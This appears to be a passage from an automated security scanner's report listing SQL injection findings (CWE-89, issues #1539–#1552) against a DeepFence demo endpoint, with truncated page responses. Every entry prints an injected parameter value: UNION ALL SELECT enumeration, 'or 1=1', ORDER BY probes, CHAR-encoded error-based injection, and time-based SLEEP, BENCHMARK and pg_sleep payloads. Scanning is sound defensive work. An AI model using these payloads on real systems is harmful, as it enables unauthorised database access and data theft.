href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1539\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1540\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1541\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1542\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1543\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ``\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1544\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1545\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1546\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1547\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1548\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1549\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1550\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1551\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1552\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" 